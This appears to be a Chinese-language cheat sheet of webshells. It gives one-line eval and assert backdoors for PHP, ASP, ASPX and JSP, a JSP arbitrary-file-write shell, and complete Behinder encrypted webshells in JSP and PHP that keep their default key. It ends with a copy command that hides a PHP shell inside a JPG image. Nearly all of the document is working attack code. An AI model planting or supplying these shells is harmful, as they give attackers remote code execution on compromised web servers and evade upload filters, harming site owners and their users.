一句话木马整理

# 日常系列

# phtml

<script language="php">eval($_POST['milkii0']);</script>

# php

<?php @eval($_POST['milkii0']); ?>
    
<?php assert($_POST['milkii0']);?> 
    
<O>h=@eval($_POST['milkii0']);</O>

# asp

<%execute(request("milkii0"))%>

<%execute request("milkii0")%>

<%eval request("milkii0")%>

# aspx

<%@ Page Language="Jscript" %>
<%eval(Request.Item["milkii0"]);%>

<%@ Page Language="Jscript" validateRequest="false" %><%Response.Write(eval(Request.Item["milkii0"],"unsafe"));%>

# jsp

<%
if(request.getParameter("file_name")!=null)(
    new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("file_name"))).write(request.getParameter("file_content").getBytes()
);
%>

# 冰蝎系列

# jsp

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%>
<%!
    class U extends ClassLoader{
    U(ClassLoader c){
        super(c);
    }
    public Class g(byte []b){
        return super.defineClass(b,0,b.length);
    }
}%>
<%
if (request.getMethod().equals("POST")){
    String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond*/
    session.putValue("u",k);
    Cipher c=Cipher.getInstance("AES");
    c.init(2,new SecretKeySpec(k.getBytes(),"AES"));
    new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);
}
%>

# php

<?php
@error_reporting(0);
session_start();
    $key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond
	$_SESSION['k']=$key;
	session_write_close();
	$post=file_get_contents("php://input");
	if(!extension_loaded('openssl'))
	{
		$t="base64_"."decode";
		$post=$t($post."");
		
		for($i=0;$i<strlen($post);$i++) {
    			 $post[$i] = $post[$i]^$key[$i+1&15]; 
    			}
	}
	else
	{
		$post=openssl_decrypt($post, "AES128", $key);
	}
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
	class C{public function __invoke($p) {eval($p."");}}
    @call_user_func(new C(),$params);
?>

# 图片马合成命令

copy 1.jpg+1.php 2.jpg